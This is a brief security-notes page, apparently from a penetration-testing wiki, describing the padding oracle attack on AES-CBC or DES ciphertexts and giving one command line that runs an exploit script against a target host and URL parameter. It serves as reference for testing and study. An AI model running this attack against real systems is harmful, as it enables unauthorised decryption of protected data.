CtrlK

Padding Oracle Attack

If you have an cyphertext (encrypted text) using AES-256-CBC-PKCS7 (or DES) and an oracle you can run this attack. Lots more details here: https://github.com/mpgn/Padding-oracle-attack

python3 exploit.py -c '4358b2f77165b5130e323f067ab6c8a92312420765204ce350b1fbb826c59488' -l '8' --host target.ip:2290 -u '/?c=' -v --error '0'

PreviousVulnerability Methods NextUnsecure JSON Web Token (JWT)

Last updated 3 years ago